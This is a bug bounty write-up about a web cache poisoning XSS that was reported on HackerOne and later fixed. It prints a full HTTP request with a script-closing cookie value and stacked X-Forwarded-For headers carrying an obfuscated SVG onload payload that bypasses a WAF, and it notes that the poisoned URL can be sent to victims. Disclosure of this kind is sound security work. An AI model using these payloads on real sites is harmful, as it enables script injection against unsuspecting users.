How I Made $16,500 Hacking CDN Caching Servers — Part 2

@bxmbn

bombon
InfoSec Write-ups
Published in
2 min readJan 29, 2022

--

A Nice Way To Hide XSS

Bounty: $2,000

While Google Dorking, i found a particular URL, but this time, was not being cached, but if i added an cacheable extension file (.js , .css) at the end of URL, it would cache the response.

Now, all i needed was to found a XSS. I found an injection point on a Cookie, but WAF would trigger when i added anything after %20

Cookie: cookiename=xss</script%20

While trying to bypass the WAF, I realized that my IP was also being reflected on that same script..

guid="</script ","24.99.19.20"

Since my IP was being reflected, I tried “X-Forwarded-For” Headers, this way i can close the <script> and avoid WAF, as it would trigger if it detected <[anything]>

This is why you will see 3 “X-Forwarded-For” Headers

Request:

GET /xxx/xx/xxx.xx/x.js?t=2021111121 HTTP/2 
Host: Redacted
X-Forwarded-For: xss
X-Forwarded-For: xss><svg/onload=globalThis[`al`+/ert/.source]`1`// X-Forwarded-For: >
Cookie: gdId=xss</script%20

Response:

...
guid="</script ","24.99.19.20","xss","xss><svg/onload=globalThis[`al`+/ert/.source]`1`//,">
...

After Poisoned an URL with an XSS, an attacker just needed to send it to the victim

redacted.com/xxx/xx/xxx.xx/x.js?t=2021111121

A nice way to hide XSS :D

This was my favorite Cache Poisoning, and it was found on a Public Program

https://hackerone.com/reports/1424094

Timeline:

Reported → December 11, 2021

Triaged → December 14, 2021

Bounty Awarded → January 7, 2022

Fixed → March 7, 2022

Next:

Part 3: Cache Poisoning DoS Via X-Forwarded-Scheme Header

🔈 🔈 Infosec Writeups is organizing its first-ever virtual conference and networking event. If you’re into Infosec, this is the coolest place to be, with 16 incredible speakers and 10+ hours of power-packed discussion sessions. Check more details and register here.

--

--

Published in InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Responses (3)

What are your thoughts?